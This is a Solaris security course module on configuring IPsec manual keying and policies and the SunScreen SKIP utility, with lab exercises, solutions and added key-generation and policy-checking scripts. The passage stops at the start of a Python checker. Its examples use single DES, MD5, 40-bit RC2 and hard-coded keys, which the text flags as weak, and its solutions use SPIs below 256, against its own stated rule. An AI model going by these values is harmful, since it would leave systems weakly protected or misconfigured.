To improve security, the add command is not accepted on the command line: keys given as command-line arguments would be visible to other users in process listings (ps) and in shell history files, so add commands must be read from a file or typed in an interactive session. Code 11-1 is an example key file that sets up ESP encryption between two hosts.

Code 11-1 Example Encryption Key Management File

# Example SA key management file - encryption

add esp spi 0x2112 src <this host> dst <other host> \
    encralg des encrkey be02938e7def2839

add esp spi 0x5150 src <other host> dst <this host> \
    encralg des encrkey 8bd4a52e10127deb

Note – Each IPsec key command must be on a single line, which explains the use of the line continuation backslash (\) character.

The source and destination addresses must be either host names listed in the /etc/hosts file or IP addresses. This pair of security associations uses DES to encrypt the data. Single DES has only a 56-bit effective key; prefer 3des where both hosts support it.

The spi parameter specifies the security parameters index of the SA. It is a 32-bit integer carried in every protected datagram so that the receiving host can find the right SA. You can use any unique random 32-bit value above 255 (the values 1 through 255 are reserved), as long as the peer uses the same number for the same direction of traffic and it does not collide with an SPI already in use for the same destination and protocol.

Configuring AH authentication requires a similar set of key definitions for each pair of communicating hosts. Code 11-2 shows the "Example Authentication Key Management File".

Code 11-2 Example Authentication Key Management File

# Example SA key management file - authentication

add ah spi 0x2112 src <this host> dst <other host> \
    authalg md5 authkey bde359723576fdea08e56cbe876e24ad

add ah spi 0x5150 src <other host> dst <this host> \
    authalg md5 authkey 930987dbe09743ade09d92b4097d9e93


There is no standard method of configuring the IPsec key definition files, but it is common practice to store the keys in a file called /etc/inet/ipseckeys and load the keys as part of the system boot process, as shown in Code 11-3. Because the file contains the keys in clear, it must be owned by root with mode 600.

Code 11-3 Example ipseckeys File

# more /etc/inet/ipseckeys
add esp spi 0x2112 src wallace dst grommit \
    encralg des encrkey be02938e7def2839
add esp spi 0x5150 src grommit dst wallace \
    encralg des encrkey 8bd4a52e10127deb
add ah spi 0x2113 src wallace dst grommit \
    authalg md5 authkey bde359723576fdea08e56cbe876e24ad
add ah spi 0x5151 src grommit dst wallace \
    authalg md5 authkey 930987dbe09743ade09d92b4097d9e93

Then create a boot script called /etc/rc3.d/S99ipsec_startup containing the lines shown in Code 11-4. The name must begin with a capital S: the rc scripts run only S* files, so a script named s99ipsec_startup would never be executed. Note that the IPsec policy in /etc/inet/ipsecinit.conf is applied earlier in the boot sequence than this script runs, so traffic that the policy requires to be protected is dropped until the keys are loaded.

Code 11-4 Example ipsec_startup Script

#!/sbin/sh
case $1 in
start)
    if [ -f /etc/inet/ipseckeys ]
    then
        /usr/sbin/ipseckey -f /etc/inet/ipseckeys
    fi
    ;;
stop)
    /usr/sbin/ipseckey flush
    ;;
esac
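Rather than inventing keys and SPIs by hand, as Code 11-1 through Code 11-3 and the exercise at the end of this module do, generate them. The following shell script is an added example, not part of the Sun course: it writes a complete key file in ipseckey syntax for the wallace/grommit pair, with random 32-bit SPIs outside the reserved range and keys of the correct length for the chosen algorithms, and creates the file with mode 600. The host names are taken from Code 11-3; /dev/urandom, the key_bytes table and the output file name are assumptions made for the example.

```shell
#!/bin/sh
# Added example, not part of the Sun course: generate a complete key file in
# ipseckey syntax for one pair of hosts, with random SPIs and random keys of
# the right length, instead of the hand-picked values shown in Code 11-1 to
# 11-3 and in the exercise. Host names wallace and grommit come from Code
# 11-3; /dev/urandom and the output file name are assumptions.

# Print n random bytes as lower-case hex with no separators.
random_hex() {
    od -An -tx1 -N "$1" /dev/urandom | tr -d ' \n'
}

# Print a random 32-bit SPI as 0x........, skipping 0 and the
# IANA-reserved values 1 to 255.
random_spi() {
    while :; do
        hex=$(random_hex 4)
        if [ "$((0x$hex))" -gt 255 ]; then
            printf '0x%s\n' "$hex"
            return 0
        fi
    done
}

# Key length in bytes for the algorithms named in this module (assumed table).
key_bytes() {
    case $1 in
        des)  echo 8 ;;   # 64-bit DES key, 56 effective bits
        3des) echo 24 ;;  # three DES keys
        md5)  echo 16 ;;  # HMAC-MD5
        sha1) echo 20 ;;  # HMAC-SHA1
        *)    echo "key_bytes: unknown algorithm $1" >&2; return 1 ;;
    esac
}

# Emit ESP and AH add commands for both directions between two hosts.
# Usage: gen_ipseckeys host1 host2 encralg authalg
gen_ipseckeys() {
    h1=$1; h2=$2; enc=$3; auth=$4
    eb=$(key_bytes "$enc") || return 1
    ab=$(key_bytes "$auth") || return 1
    printf '# SA key file for %s <-> %s, generated %s\n' "$h1" "$h2" "$(date)"
    for pair in "$h1 $h2" "$h2 $h1"; do
        set -- $pair    # $1 = src, $2 = dst for this direction
        printf 'add esp spi %s src %s dst %s \\\n    encralg %s encrkey %s\n' \
            "$(random_spi)" "$1" "$2" "$enc" "$(random_hex "$eb")"
        printf 'add ah spi %s src %s dst %s \\\n    authalg %s authkey %s\n' \
            "$(random_spi)" "$1" "$2" "$auth" "$(random_hex "$ab")"
    done
}

# Write the key file readable by root only: it holds the keys in clear.
write_ipseckeys() {
    out=$1; shift
    ( umask 077; gen_ipseckeys "$@" > "$out" )
}

IPSECKEYS_FILE=${IPSECKEYS_FILE:-$(mktemp)}
write_ipseckeys "$IPSECKEYS_FILE" wallace grommit 3des sha1
# Both hosts load the same file (ipseckey -f). Carry it to the peer over a
# channel that is already secure, for example on removable media or by
# typing it in; never by e-mail or clear-text file transfer.
```

Run it as root with IPSECKEYS_FILE=/etc/inet/ipseckeys on one host, copy the resulting file to the peer over an already secure channel, and load it on both with ipseckey -f. Change the last two arguments to des md5 to reproduce the algorithms used in the text.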


Configuring IPsec Policies

The policies currently in force on a host are held in the /etc/inet/ipsecpolicy.conf file. You add entries with the ipsecconf configuration utility.

Changes made with the command line tools are not preserved after a shutdown. This means that a machine defaults to insecure communications after a reboot. To avoid this problem, add the IPsec policies for the required communications to the /etc/inet/ipsecinit.conf file, which is read during the boot process. If this file exists, the inet initialization script applies the IPsec security policies during startup.

Note – IPsec is not enabled if the /etc/inet/ipsecinit.conf file does not exist at system boot time. An empty file is enough to enable it.


Using the ipsecconf utility to Configure IPsec

The ipsecconf utility is a command line utility that sets the policy and rules that apply to system-level IP traffic. Table 11-1 describes the ipsecconf options.

Table 11-1 The ipsecconf Options

Flag Option

None Queries the current configuration status. Entries are shown with an index number.

-a file Adds one or more new policies listed in file to the system.

-d index Deletes the policy identified by the index number from the system.

-f Flushes all policies.

-l Provides a listing of the policy entries.

-n Shows network addresses and ports numerically instead of resolving them to names. Use the -n option together with the -l option.

-q Prevents the display of the warning and banner messages (quiet mode).

IPsec configurations are stored in the /etc/inet/ipsecpolicy.conf file. The ipsecconf utility maintains this file with precedence rules. Do not edit this file manually or you might alter the precedence of policies and compromise the security of your system.


Syntax for the IPsec Configuration File

The IPsec configuration file syntax is:

{pattern} action {properties}

where:

pattern is one or more name value pairs, as shown in Table 11-2 on page 11-21

action is a policy action, as shown in Table 11-3 on page 11-21

properties is one or more policy properties, as shown in Table 11-4 on page 11-22


Table 11-2 Definitions for IPsec Policy Patterns

Pattern Definition

saddr The source address of the datagram being configured. A host name or an IP address; IP addresses are safer (see "Security Considerations With IPsec").

daddr The destination address, in the same form as saddr.

smask A source mask that allows a subnet to be specified. Use either hexadecimal (0xffff0000) or Internet dot (255.255.0.0) notation.

dmask A destination mask using the same notations as smask.

dport The destination port to be controlled, as a number or a service name from /etc/services (for example telnet). Only datagrams to that port match the rule.

ulp The upper-layer protocol (for example tcp or udp). Code 11-7 uses ulp tcp so that only TCP datagrams match.

Table 11-3 Definitions for IPsec Policy Actions

Action Definition

apply Applies IPsec to the datagram (valid for outbound traffic only)

permit Permits the datagram if it matches the constraints (inbound traffic only)

bypass Bypasses any policy checks if the datagram matches the pattern


Table 11-4 Definitions for IPsec Policy Properties

Property Definition

auth_algs The AH authentication algorithm: MD5 or HMAC-MD5, SHA1 or HMAC-SHA1. Use ANY if there is no preference for the authentication.

encr_auth_algs The ESP authentication algorithm, applied to the encrypted payload. Takes the same values as auth_algs.

encr_algs The ESP encryption algorithm. Must be one of two possibilities: DES or DES-CBC (single DES), or 3DES or 3DES-CBC (triple DES). Use NULL for no encryption.

sa Either shared or unique. shared, as used in Code 11-7, lets one SA serve all traffic matching the policy; unique requests a separate SA per connection.


Rules for Parsing the Configuration File

When the file is loaded, each statement writes a separate policy to the system. Policies are applied in the order in which they are found in the file, with the following exceptions:

● A bypass action always has the highest precedence.

● An ESP policy is stronger than an AH policy. When a policy further down the file defines a stronger level of protection for the same traffic, the stronger policy has higher precedence. The strongest rules contain both ESP and AH components.

To specify a policy with ESP and AH components, define both auth_algs (AH) and encr_algs (ESP) or encr_auth_algs (ESP) in the same policy.


Example IPsec Configurations

The hostB example in Code 11-5 is an inbound (permit) rule: it specifies that any packet arriving from hostA must be encrypted with 3DES and authenticated with SHA1 (ESP authentication); hostB discards packets from hostA that are not protected this way.

Code 11-5 Example IPsec Configuration to Encrypt and Authenticate

#
# Encrypt data from hostA to hostB
#
{
    saddr hostA
    daddr hostB
}
permit
{
    encr_algs 3DES
    encr_auth_algs SHA1
}


Code 11-6 is an inbound (permit) rule. As written, it matches datagrams whose destination address is on the 134.56.0.0/16 network and accepts them only if they carry an authentication header, using any supported algorithm. To require authentication of traffic by the network it comes from, as the comment suggests, pattern on the source with saddr and smask instead.

Code 11-6 Example IPsec Configuration to Authenticate All Data From Network 134.56.0.0

#
# Authenticate 134.56.x.x
# Allow any authentication scheme
#
{
    daddr 134.56.0.0    # Network address
    dmask 0xffff0000
}
permit
{
    auth_algs any
}

Code 11-7 is the outbound (apply) rule for hostA: all TCP traffic sent from hostA to hostB is encrypted with DES. It protects only TCP (ulp tcp); UDP and ICMP between the two hosts are left in clear.

Code 11-7 Example IPsec Configuration to Encrypt Data

#
# Protect the outbound TCP traffic between machines
# using ESP and use DES algorithm.
#
{
    saddr hostA
    daddr hostB
    ulp tcp             # only TCP datagrams.
} apply {
    encr_algs DES       # Use DES to encrypt
    sa shared           # Use shared SA
}
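With manual keying, the policy file and the key file must agree: a policy that requires ESP or AH for a pair of addresses that has no matching SA drops that traffic, and nothing in the utilities above checks this for you. The following shell script is an added example, not part of the Sun course: it lists the SAs that a policy file in ipsecinit.conf syntax requires and compares them with the SAs defined in a key file in ipseckey syntax, reporting each one as OK or MISSING. The function names and the sample files written at the end are constructed for this example; addresses are compared as the literal strings used in the two files, so use the same form (names or IP addresses) in both.

```shell
#!/bin/sh
# Added example, not part of the Sun course: cross-check a policy file in
# ipsecinit.conf syntax against a key file in ipseckey syntax. A policy
# that requires ESP or AH for a src/dst pair with no matching manual SA
# makes the kernel drop that traffic; an SA with no policy protects nothing.
# Addresses are compared as the literal strings used in the two files.

# Print one line per SA the policy file needs: "<esp|ah> <saddr> <daddr>".
required_sas() {
    sed 's/#.*//' "$1" | tr '\n' ' ' | awk '
        BEGIN { RS = "}" }               # records alternate: pattern, action+properties
        {
            gsub(/[{]/, " { ")           # so that "{saddr" splits into "{" and "saddr"
            if ($0 !~ /[{]/) next        # trailing whitespace after the last policy
            if (NR % 2 == 1) {           # pattern block
                saddr = ""; daddr = ""
                for (i = 1; i <= NF; i++) {
                    if ($i == "saddr") saddr = $(i + 1)
                    if ($i == "daddr") daddr = $(i + 1)
                }
                next
            }
            action = $1; esp = 0; ah = 0 # action block: apply, permit or bypass
            for (i = 2; i <= NF; i++) {
                if ($i == "encr_algs" && toupper($(i + 1)) != "NULL") esp = 1
                if ($i == "encr_auth_algs") esp = 1
                if ($i == "auth_algs") ah = 1
            }
            if (action == "bypass") next
            if (saddr == "" || daddr == "") {
                print "UNCHECKED " action " policy without both saddr and daddr"
                next
            }
            if (esp) print "esp " saddr " " daddr
            if (ah) print "ah " saddr " " daddr
        }'
}

# Print one line per SA in the key file: "<esp|ah> <src> <dst>". Lines
# continued with a trailing backslash are joined first.
configured_sas() {
    sed -e ':a' -e '/\\$/N; s/\\\n//; ta' "$1" | sed 's/#.*//' | awk '
        $1 == "add" {
            src = ""; dst = ""
            for (i = 3; i <= NF; i++) {
                if ($i == "src") src = $(i + 1)
                if ($i == "dst") dst = $(i + 1)
            }
            print $2 " " src " " dst
        }'
}

# Usage: ipsec_check_pairs policy-file key-file
# Prints OK/MISSING/UNCHECKED per policy; exit status 1 if any SA is missing.
ipsec_check_pairs() {
    have=$(configured_sas "$2")
    report=$(required_sas "$1" | while read -r need; do
        case $need in
        UNCHECKED*) echo "$need" ;;
        *) if printf '%s\n' "$have" | grep -Fqx "$need"; then
               echo "OK $need"
           else
               echo "MISSING $need"
           fi ;;
        esac
    done)
    printf '%s\n' "$report"
    case $report in *MISSING*) return 1 ;; esac
    return 0
}

# Constructed sample input: ESP is keyed in both directions, the AH policy
# for hostB -> hostA is not, and the subnet rule has no saddr to check.
write_sample_files() {
    cat > "$1/ipsecinit.conf" <<'EOF'
{saddr hostA daddr hostB ulp tcp} apply {encr_algs 3DES encr_auth_algs SHA1 sa shared}
{saddr hostB daddr hostA ulp tcp} permit {encr_algs 3DES encr_auth_algs SHA1}
{ saddr hostB daddr hostA } permit { auth_algs SHA1 }
{ daddr 134.56.0.0 dmask 0xffff0000 } permit { auth_algs any }   # as in Code 11-6
EOF
    cat > "$1/ipseckeys" <<'EOF'
# constructed keys for the example: never reuse them
add esp spi 0x2112 src hostA dst hostB \
    encralg 3des encrkey 0123456789abcdef0123456789abcdef0123456789abcdef
add esp spi 0x5150 src hostB dst hostA \
    encralg 3des encrkey fedcba9876543210fedcba9876543210fedcba9876543210
EOF
}

SAMPLE_DIR=$(mktemp -d)
write_sample_files "$SAMPLE_DIR"
ipsec_check_pairs "$SAMPLE_DIR/ipsecinit.conf" "$SAMPLE_DIR/ipseckeys" \
    || echo "key file is incomplete for this policy"
```

On a live host, run ipsec_check_pairs against /etc/inet/ipsecinit.conf and /etc/inet/ipseckeys before rebooting, or against the output of ipseckey -s to check what is actually loaded. Policies without both saddr and daddr (subnet rules such as Code 11-6) are reported as UNCHECKED because, with manual keying, every peer in that subnet needs its own SA.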


Security Considerations With IPsec

The security of IPsec can be compromised if intruders gain access to the key or policy files. Follow these guidelines to use IPsec securely:

● Do not transport the key file in clear text over the network.

● Do not keep the key file on an NFS file system.

● Ensure that the policies, and the keys they need, are in force before starting any communication.

● Do not change policies in the middle of a communication.

● Host names in policy and key files are resolved through the naming service. If that service is compromised, an attacker who knows the source address a rule expects can redirect a name to a host of their choice. Use IP addresses instead of names.

● Use AH and ESP together to provide the highest level of protection.

● If any host using IPsec is compromised, every key stored on that host is exposed, so all the SAs it shares with other hosts must be regenerated.

● Manual keying is impractical for large numbers of hosts: each ordered pair of hosts needs its own SA, so n fully meshed hosts require n(n-1) keys per protocol. Ten hosts require 90 keys for ESP alone, and twice that with AH.


Using the SunScreen™ SKIP Utility

Another utility available for the Solaris OE besides IPsec that you can use to protect network protocols is SKIP (Simple Key-management for Internet Protocols). SKIP is bundled with SunScreen™ Secure Net 3.0 and SunScreen™ Lite; it can also be obtained as a separate standalone product.

The SKIP utility builds an encrypted channel between two hosts and authenticates every network packet using an authentication algorithm. It is especially useful between local hosts that are not located behind a firewall. Administrators like using SunScreen SKIP because it is easy to add and remove systems, and to turn encryption and authentication on and off, without major network alterations.

SKIP runs a kernel module on each host that can be visualized as residing between the network interface of the host and the IP software layer. SKIP intercepts data packets and performs encryption and authentication on transmission and reception, making the packets unreadable to anyone monitoring the network.


Configuring the SKIP Utility

Install the SKIP cluster on each workstation that will use it. This cluster consists of the following packages:

● SUNWbdc – SKIP Bulk Data Crypt 1.5 Software

● SUNWbdcx – SKIP Bulk Data Crypt (64-bit) 1.5 Software

● SUNWrc2 – SKIP RC2 Crypto Module 1.5 Software

● SUNWrc4 – SKIP RC4 Crypto Module 1.5 Software

● SUNWrc4x – SKIP RC4 Crypto Module (64-bit) 1.5 Software

● SUNWes – SKIP End System 1.5-FCS Software

● SUNWesx – SKIP End System 1.5-FCS (64-bit) Software

● SUNWkeymg – SKIP Key Manager Tools 1.5 Software

● SUNWkisup – SKIP I-Support Module 1.5 Software

● SUNWsman – SKIP I-Man page Module 1.5 Software

Before the network interface device can be modified for SKIP, you must generate a unique key pair on every host that will run SKIP: a Diffie-Hellman private value that never leaves the host, and the corresponding public value that peers use. This is done using the skiplocal command with the keygen (-k) argument. The command prompts you to type 50 or more random characters, which it mixes into its random number generator so that the generated key pair is unpredictable. The 512-bit modulus shown in Code 11-8 was the default when this course was written; it is weak by current standards.

Prior to using the SKIP Local ID database, you must initialize it under the /etc/skip directory using:

# skiplocal -i

Code 11-8 shows an example SKIP key generation.

Code 11-8 Example SKIP Key Generation

# skiplocal -k
generating local secret with 512 modulus size
It would help the quality of the random numbers if you would
type 50-100 random keys on the keyboard. Hit return when
you are done.
<50 or more random keystrokes are entered here>
52
Format: Hashed Public Key (MD5)
Name/Hash: 5b 50 28 e7 7c ea 9b 13 06 dd 01 d3 59 89 7f 0d
Not valid Before: Mon Jun 22 18:00:00 1998
Not valid After: Sun Jun 22 18:00:00 2003
g: 2
p:
f52aff3ce1b1294018118d7c84a70a72d686c40319c807297aca950cd9969fabd00a509b02463083d66a45d419f9c7cbd894b221926baaba25ec355e92a055f
public key:
795195d7b0e80a357945f1d1c9c60bae8fb50ec64b84cb26554a81f149e7bbd672bd272a5e6f4a1d9591f704f1b022ce873e790da5135c7cd02ed4c93a7322b
Added local identity slot 0

This example creates a unique key pair for this host. Repeat this process on every host that will be running SKIP.

To list the existing key pairs, use the skiplocal command with the list (-l) argument. The following output shows that a single key pair was generated; there would be an additional entry for each further key pair.

# skiplocal -l
Local ID Slot Name: 0 Type: Software Slot
NSID: 8 MKID (name): 5b5028e77cea9b1306dd01d359897f0d
Not Valid Before: Mon Jun 22 18:00:00 1998
Not Valid After: Sun Jun 22 18:00:00 2003
Modulus size: 512 bits

When you have a key pair defined and can list it with skiplocal -l, attach SKIP to the network interface with the skipif -a command, save the interface and access control settings with skipif -s (otherwise they are not preserved across the reboot), and then reboot. Do this on every system running SKIP.

# skipif -a
# skipif -s
# init 6


Working With SKIP

After the system has been rebooted, you build the encrypted channel. This requires the exchange of public keys between the two hosts. The skiplocal export (-x) command outputs this host's key identity as a complete skiphost command line, ready for cutting and pasting into a shell on the other host or for sending to another administrator by e-mail. One of the easiest ways to do this from a single terminal is to log in remotely from one host to the other and cut and paste between the two windows. Code 11-9 shows how to export a SKIP key.

Code 11-9 Exporting a SKIP Key

# skiplocal -x
skiphost -a grommit -R 0x9864c2c14ed58510173da60b52739b59 -r 8 -s 8 -k des-cbc -t rc2-40 -m md5

The exported line contains no secret, but its authenticity matters: the -R value is the MD5 hash of this host's public Diffie-Hellman value, and anyone who can substitute a different value while it travels over an untrusted channel (such as e-mail) can place themselves between the two hosts. Confirm the value out of band (for example, by reading it over the telephone) before using it. The output from the skiplocal -x command can be cut and pasted into a shell window on the remote host, as shown in Code 11-10.

Code 11-10 Setting a SKIP Key (From Another Host)

# skiphost -a grommit -R 0x9864c2c14ed58510173da60b52739b59 -r 8 -s 8 -k des-cbc -t rc2-40 -m md5
Adding metz: SKIP params:
  IP mode: tunneling
  Tunnel address: grommit
  Kij alg: DES-CBC
  Crypt alg: RC2-40
  MAC alg: MD5
  Receiver NSID: MD5 (DH Pub.Value)
  Receiver key id: 0x9864c2c14ed58510173da60b52739b59
  Sender NSID: MD5 (DH Pub.Value)
...done.

Note that these parameters select 40-bit RC2 (-t rc2-40) as the traffic cipher, which is export-grade strength; choose a stronger traffic cipher where the installed crypto modules provide one.

When the keys have been exchanged, both hosts must enable SKIP to communicate. To enable SKIP for encrypted transmission, use the skiphost command with the -o option followed by on, as shown in Code 11-11 on page 11-31.


Code 11-11 Enabling SKIP for Encrypted Transmissions

# skiphost -o on
hme0: access control enabled, only authorized SKIP hosts can connect
grommit: SKIP params:
  IP mode: tunneling
  Tunnel address: grommit
  Kij alg: DES-CBC
  Crypt alg: RC2-40
  MAC alg: MD5
  Receiver NSID: MD5 (DH Pub.Value)
  Receiver key id: 0x8a4d51e02683c8952c1c5693d9b32596
  Sender NSID: MD5 (DH Pub.Value)
  Sender key id: 0x9864c2c14ed58510173da60b52739b59

To disable SKIP use:

# skiphost -o off

Using Clear Text

You might not want to use encrypted communications with every system, for example with DNS and mail servers. The default entry lets all hosts that are not covered by a more specific entry communicate in clear text. Be aware that this turns access control into an allow-by-default policy: any host can then reach the system unencrypted unless a specific entry says otherwise.

# skiphost -a default


Exercise: Configuring and Using IPsec

In this exercise, you complete the following tasks:

● Configure IPsec for TCP communications between two hosts

● Restrict access to authenticated hosts

Preparation

You must install the Solaris OE security enhancements for cryptography before using IPsec. This is described in the first task of these exercises.

Tasks

For the purposes of this exercise you will work in pairs to configure encryption between your workstation and your partner's workstation. Next, you will configure IPsec to authenticate connections from your partner's workstation.

Ensure that you know the IP address of your workstation and your partner's workstation. For convenience, the tasks refer to hosts A and B: make sure that you agree as to whose workstation is hostA and whose is hostB before you start the tasks.

You are not required to finish all of the tasks in the time allocated. Complete the final task and flush the IPsec configurations and keys from the system, or reboot the system. Your instructor will give you time to do this.

Caution – Remove the IPsec configuration as described in the last task when you have finished. If you do not disable IPsec, it will prevent you from completing the other tasks in this course.


Task – Configuring IPsec

Before using IPsec, you must install some of the Sun Security enhancements packages. These can be downloaded from the Sun Web site shown in "Additional Resources" on page 11-3. For your convenience, a copy of the security enhancements has been placed in the file /usr/local/pkg/Sol8_encryption_sparc.tar.

To configure IPsec, install the Sun Cryptography packages and create anempty IPsec configuration file in the /etc/inet directory:

1. Extract the contents of this archive to the temporary directory andthen install the following packages from the /tmp/sparc/Packagessubdirectory:

● SUNWcry

● SUNWcry64

● SUNWcryr

● SUNWcryrx

2. Create an empty file called /etc/inet/ipsecinit.conf whichenables the IPsec configuration:

# touch /etc/inet/ipsecinit.conf

3. Reboot the system to enable IPsec:

# init 6

Task – Configuring IPsec Encryption

In this task, you configure IPsec encryption on two workstations and use it to communicate using the telnet command. Working with a colleague, you share encryption keys and work together to implement the steps in the correct order on the two systems. If anything is unclear, discuss it with your instructor:

1. Run ipsecconf with no command line options. You should see no output. If you see an error message, you have not enabled IPsec as described in "Task – Configuring IPsec". If you see any output, type the following commands to remove the existing IPsec configuration and keys from your system:

# ipseckey flush
# ipsecconf -f


2. With your partner, agree on two spi numbers, one for each direction of communication between your two workstations. Your spi numbers must not already be in use in your IPsec key configuration, must be greater than 255, and must be different from each other. Write your numbers down here:
spi1 hostA to hostB : _______________________
spi2 hostB to hostA : _______________________

3. Choose two 16-hexadecimal-digit (64-bit) values to use as keys for the DES encryption. Any value is accepted, but do not reuse the keys printed in this module and, outside the classroom, generate keys randomly rather than choosing memorable values. Write the encryption keys down here:
DES key1 hostA : _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
DES key2 hostB : _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

4. Edit a new file called /etc/inet/esp.keys and add the following lines. Both workstations use identical key files; the file must be readable by root only, and the keys should be shared between you by typing them in rather than by sending them over the network you are about to protect:

add esp spi spi1 src hostA dst hostB \
    encralg des encrkey key1

add esp spi spi2 src hostB dst hostA \
    encralg des encrkey key2

5. Add the IPsec keys on your machine with:

# ipseckey -f /etc/inet/esp.keys

6. Create a new configuration file called /etc/inet/esp.conf containing the following lines. Each workstation needs a different configuration file: replace thisHost with your own workstation's IP address and otherHost with your partner's.

{saddr thisHost daddr otherHost ulp tcp} apply {encr_algs DES sa shared}
{saddr otherHost daddr thisHost ulp tcp} permit {encr_algs DES}

7. Add these configuration rules with:

# ipsecconf -a /etc/inet/esp.conf

8. Start the snoop utility in a separate window to monitor traffic between your two hosts, and use the -v option so that you can see the snoop utility decode the ESP headers of the encrypted datagrams:

# snoop -v hostA and hostB

9. Use the telnet command to verify that you can still communicate between your hosts with the IPsec policy installed and that the data packets are now encrypted: snoop shows ESP headers, and the login name and password you type no longer appear in clear in the captured data.


10. Verify that you can use the telnet command to log in to another workstation (such as the instructor’s) and that this communication is unencrypted.

Task – Configuring IPsec Authentication

In this task, you configure IPsec authentication on your system and use it to communicate with a colleague using the telnet command:

1. With your partner, agree on 2 spi numbers: one for each direction of communication between your two workstations. Your spi numbers must not have already been used in your IPsec key configuration and must be different from each other. Write your numbers down here:

spi3 hostA to hostB : _______________________
spi4 hostB to hostA : _______________________

2. Choose two 32-digit numbers to use as keys for the MD5 authentication. Any value can be used. Write the authentication keys down here:

MD5 key3 hostA: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
MD5 key4 hostB: _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _

3. Edit a new file called /etc/inet/ah.keys and add the following lines. Both workstations use identical key files:

add ah spi spi3 src hostA dst hostB \
    authalg md5 authkey key3

add ah spi spi4 src hostB dst hostA \
    authalg md5 authkey key4

4. Add the IPsec keys on your machine with:

# ipseckey -f /etc/inet/ah.keys

5. Create a new configuration file called /etc/inet/ah.conf containing the following lines. Each workstation needs a different configuration file. Replace the values thisHost and otherHost with the appropriate IP addresses of your workstations.

{saddr thisHost daddr otherHost} apply {auth_algs any sa shared}
{saddr otherHost daddr thisHost} permit {auth_algs any}

6. Add these configuration rules with:


# ipsecconf -a /etc/inet/ah.conf

7. If the snoop utility is not running from the previous task, start the snoop utility in a separate window to monitor traffic between your two hosts, and use the -v option so that you can see the snoop utility detect the authenticated datagrams:

# snoop -v net hostA and net hostB

8. Use the telnet command to verify that you can still communicate between your hosts with the IPsec authentication policy installed. You should see that the packets are authenticated in the snoop output window.

9. Verify that you can use the telnet command to log in to another workstation (such as the instructor’s) and that this communication is unauthenticated.

Task – Authenticating All Hosts With IPsec

Configure IPsec to allow only specific hosts to communicate with your workstation:

1. Examine the IPsec authentication configuration you have set up. How would you change the authentication rules to only allow authenticated hosts to communicate with your host (that is, bar all non-authenticated hosts)?

2. Create a new configuration file and test your ideas. You must remove the existing configuration with:

# ipsecconf -f

Task – Using IPsec AH and ESP With All Hosts

If you completed the previous task, consider how you would extend your solution to encrypt as well as authenticate all host communication. You must remove the existing configuration with:

# ipsecconf -f


Task – Removing IPsec

Remove the IPsec configuration so that it does not interfere with the exercises in future modules of this course, as follows:

1. When you have finished these tasks, make sure that you remove all IPsec keys and configuration rules using:

# ipseckey flush
# ipsecconf -f

2. Optionally, you can remove the IPsec initialization file and reboot your workstation:

# rm /etc/inet/ipsecinit.conf
# init 6


Exercise Summary


Discussion – Take a few minutes to discuss what experiences, issues, or discoveries you had during the lab exercise.

● Experiences

● Interpretations

● Conclusions

● Applications


Exercise Solutions

The following are the solutions for the tasks defined in the preceding section.

Because most of the task steps are actually instructions, solutions are only given below where an explicit question has been asked. If you have questions about any of the other steps, consult the instructor.

Configuring IPsec

Before using IPsec you must install some of the Sun Security enhancements packages. These can be downloaded from the Sun Web site shown in “Additional Resources” on page 11-3. For your convenience, a copy of the security enhancements archive has been placed at /usr/local/pkg/Sol8_encryption_sparc.tar.

1. Extract the contents of this archive to the temporary directory and then install the following packages from the /tmp/sparc/Packages subdirectory:

● SUNWcry

● SUNWcry64

● SUNWcryr

● SUNWcryrx

# cd /tmp
# tar xvf /usr/local/pkg/Sol8_encryption_sparc.tar
# cd sparc/Packages
# pkgadd -d SUNWcry
# pkgadd -d SUNWcry64
# pkgadd -d SUNWcryr
# pkgadd -d SUNWcryrx

2. Create an empty file called /etc/inet/ipsecinit.conf, which enables the IPsec configuration.

# touch /etc/inet/ipsecinit.conf

3. Reboot the system to enable IPsec:

# init 6


Configuring IPsec Encryption

1. Your configuration files should look something like the following (assuming the host IP addresses are 192.168.0.1 and 192.168.0.2).

# cat /etc/inet/esp.keys
add esp spi 20 src 192.168.0.1 dst 192.168.0.2 \
    encralg des encrkey 1234567890123456
add esp spi 21 src 192.168.0.2 dst 192.168.0.1 \
    encralg des encrkey 6543210987654321
#
# cat /etc/inet/esp.conf
{saddr 192.168.0.1 daddr 192.168.0.2} apply {encr_algs any sa shared}
{saddr 192.168.0.2 daddr 192.168.0.1} permit {encr_algs any}

Configuring IPsec Authentication

Your configuration files should look something like the following (assuming the host IP addresses are 192.168.0.1 and 192.168.0.2).

# cat /etc/inet/ah.keys
add ah spi 22 src 192.168.0.1 dst 192.168.0.2 \
    authalg md5 authkey 12345678901234567892123456789312
add ah spi 23 src 192.168.0.2 dst 192.168.0.1 \
    authalg md5 authkey 21398765432129876543210987654321
#
# cat /etc/inet/ah.conf
{saddr 192.168.0.1 daddr 192.168.0.2} apply {auth_algs any sa shared}
{saddr 192.168.0.2 daddr 192.168.0.1} permit {auth_algs any}

Authenticating All Hosts With IPsec

1. Examine the IPsec authentication configuration you have set up. How would you change the authentication rules to only allow authenticated hosts to communicate with your host (that is, bar all non-authenticated hosts)?

2. Create a new configuration file and test your ideas.


3. Edit the AH configuration rules to remove the references to the other workstation: remove the daddr option from the apply line and the saddr option from the permit line. All incoming and outgoing communication will then be authenticated, and no access to or from unauthenticated hosts is allowed. You can test this by trying to use the telnet command to log in to another workstation, such as the instructor’s machine. The Telnet session will not connect and will eventually time out.

Your IPsec configuration file will look like:

# cat /etc/inet/all.conf
{saddr 192.168.0.1} apply {auth_algs any sa shared}
{daddr 192.168.0.1} permit {auth_algs any}

Using IPsec AH and ESP With All Hosts

1. If you completed the previous task, consider how you would extend your solution to encrypt as well as authenticate all host communication.

2. Add an encryption rule to your configuration file so that it looks something like:

# cat /etc/inet/all.conf
{saddr 192.168.0.1} apply {auth_algs any encr_algs any sa shared}
{daddr 192.168.0.1} permit {auth_algs any encr_algs any}
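The key and policy files written in these tasks are easy to get subtly wrong: a reused SPI, a key of the wrong length for its algorithm, or a policy that still names a single peer and so leaves every other host in the clear. The checker below is an added example written for this guide, not part of the Sun course material or of any Solaris tool; it parses the ipseckey and ipsecconf line formats shown in the solutions above and reports such problems. The algorithm/key-length table, the sample files and the coverage logic are assumptions of the example.

```python
import re

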